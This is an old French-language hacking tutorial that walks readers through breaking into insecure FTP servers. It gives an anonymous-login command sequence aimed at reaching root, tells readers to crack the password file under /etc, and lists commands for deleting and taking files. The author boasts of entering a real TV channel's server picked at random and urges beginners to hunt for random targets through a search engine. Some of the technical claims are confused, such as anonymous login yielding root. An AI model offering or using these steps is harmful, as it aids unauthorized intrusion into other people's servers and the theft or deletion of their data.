hack par ftp
On ne m'a pas encore
fait le reproche de ne pas donner assez de techniques de hacking dans la
rubrique hacking mais dans un désir d'anticiper ce reproche, je vais donner une
manière de hacker un serveur non sécurisé par ftp. D'abord on va expliquer ce
qu'est ftp. ftp c'est un protocole qui permet de transmettre des fichiers d'un
ordinateur à un autre. Les ports qui lui sont attribués sont les n°20 et 21.
Quand vous allez sur un site de Warez pour choper des progs crackés vous passez
généralement par ftp, vous voulez télécharger une page WEB, c'est aussi par ftp,
quand vous vous rendez sur un serveur en tant que user, c'est aussi des fois par
ftp. Si vous êtes sous windows, pour ouvrir une fenêtre ftp, il faut faire:
Démarrer, Exécuter, et taper "ftp -n". Bon, faut pas pousser non plus, c'est pas
aussi simple que ça de hacker un serveur par ftp, il suffit pas d'ouvrir la
fenêtre ftp, c'est plus compliqué car chaque serveur demande un login et un
password pour chaque user.
Le truc que je vais vous donner ne marche que sur les serveurs non sécurisés
alors n'essayez pas ça sur le Pentagone, ça marchera pas. On parle toujours du
Pentagone, de la CIA, de la Nasa... mais il y a pleins de serveurs sécurisés
dans le monde et ils ne sont pas forcement gouvernementaux, loin de là...
Je vous donne le truc et on en reparle après:
open url_du_site
quote user ftp
quote cwd ~root
quote pass ftp
Mettez des espaces ou je les ai mis et tout ce passera bien.
Exemple: open www.assassin.com
quote user ftp
quote cwd ~root
quote pass ftp
Ici le serveur a comme adresse url: http://www.assassin.com/
Ces instructions doivent être entrées dans un fenêtre ressemblant beaucoup à
celle du dos, à chaque ligne, il y aura marqué "ftp>". Pour ouvrir cette fenêtre
on procède comme expliqué précedement. Une fois connecté à un site (après avoir
tapé: open url_du_site), vous verez apparaitre "Connected to url_du_site". Il se
peut qu'après vous être connecté à un serveur vous receviez le message suivant:
"Ce serveur est protégé" ou "attention aux malversations que vous pourrez faire"
ou "regardes par la fenêtre, les flics sont déjà en bas de chez toi"... Dans ce
cas là c'est même pas la peine d'aller plus loin car à 99% le serveur est
sécurisé car si l'administrateur réseau a pu être assez consciencieux pour
mettre un message d'avertissement, il l'est assez pour nous empêcher de pénétrer
de cette manière dans sont serveur. :-(
Il se peut même qu'une fois connecté, vous voyez "Connexion closed by remote
host.", là c'est encore plus vache, c'est que le serveur n'est pas accessible de
cette manière par ftp. De cette manière seulement.... ;-)
Vous allez voir maintenant en premier ce que répond le serveur si on peut
rentrer dedans puis ce qu'il répond si on ne peut pas rentrer dedans
Ce qui est en bleu c'est ce que l'on tape
Ce qui est en jaune c'est ce que le serveur répond
Ce qui est en blanc c'est soit ftp soit des remarques de ma part
Serveur que l'on pourra hacker par ce moyen :
ftp>open www.assassin.com
Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0).
"Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de
celui ci... Il se peut même qu'il y ait marqué la
date et l'heure de la dernière mise à jour."
ftp>quote user ftp
331 Anonymous acces allowed, send
identify (e-mail name) as password.
ftp>quote cwd ~root
530 Please login with USER and
PASS.
ftp>quote pass ftp
230 Anonymous user logged in.
Voilà, logiquement et sauf erreur vous êtes root ou tout du moins user, si c'est
le cas, il faut trouver /etc puis décrypter le password et là vous vous
connecterez en tant que root. :-)
Serveur que l'on ne
pourra pas hacker par ce moyen :
ftp>open www.assassin.com
Connected to www.assassin.com
websrv1 Microsoft FTP Service (Version 4.0).
"Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de
celui ci... Il se peut même qu'il y ait marqué la
date et l'heure de la dernière mise à jour."
ftp>quote user ftp
331 Password required for ftp.
ftp>quote cwd ~root
530 Please login with USER and
PASS.
ftp>quote pass ftp
530 User ftp cannot log in.
Bon, bah là, rien à faire avec cette méthode, c'est probablement un serveur dit
"secure", quoi que... Bref une seule remarque: :-(
une fois que vous êtes root ou user, ca sont les commandes ftp qui s'appliquent
(pas les commandes dos ni les commandes unix):
mkdir : pour créer un répertoire (exemple: mkdir assassin crée le répertoire
assassin).
rmdir : pour supprimer un répertoire (exemple: rmdir assassin supprime le
répertoire assassin).
pwd : pour voir ou vous êtes sur le disque.
cd : pour aller dans un répertoire (exemple: cd assassin pour aller dans le
répertoire assassin).
dir : pour voir le contenu de la racine ou du répertoire où vous êtes.
cd / : pour revenir à la racine. Ne pas oublier l'espace entre cd et /.
cd .. : pour revenir au répertoire précédent. Ne pas oublier l'espace entre cd
et ..
del : pour supprimer un fichier (exemple: del assassin.txt supprime le fichier
assassin.txt).
get : pour prendre un fichier et le mettre sur votre bureau (exemple: get
assassin.txt vous donne le fichier assassin.txt)
Pour vous illustrer un peu cet article je suis allé sur altavista (pas
astalavista) et j'ai tapé un mot au hasard (en l'occurrence ici c'était télé),
je suis tombé sur une dizaine de sites et j'en ai pris un au hasard, j'ai noté
son url. Là c'était www.comedie.com (vous savez, le serveur de la chaîne télé
comédie qui passe sur le câble). J'ai appliqué ce que j'ai écris au dessus plus
deux ou trois autres petits trucs et je suis devenu root sur la bécane, le temps
de m'amuser un petit peu. Je n'ai rien supprimé vu que je suis un gentil hacker
mais j'ai laissé des traces de mon passage... En utilisant cette méthode vous ne
serez pas root (777) sur cette bécane mais vous pourrez quand même faire pas mal
de choses. Cet exploit étant périmé sur la plupart des bécanes, vous ne serez
que User sur un account anonymous, cependant la perle rare se trouve quelque
part, malheureusement avec le temps elle devient de plus en plus rare. Vous
pourrez même vous en servir de vmb pour me laisser des messages si le coeur vous
en dit...
Pour quitter ftp, vous n'avez qu'à taper "quit". Voilà c'est tout, amusez vous
bien mais ne foutez pas la merde sinon je ne donnerais plus rien.
PS: Pour la vmb je plaisantais, évitez de le faire car une fois hacké, ce
serveur mettra en place des instruments de recherche pour éviter que cela ne
recommence. Alors si vous êtes débutant, cherchez un autre serveur, faites comme
j'ai fais pour le serveur de comédie: Altavista.
et si vous avez des trucs , astuces ou autres choz , n'importe koi , envoyez ...merci !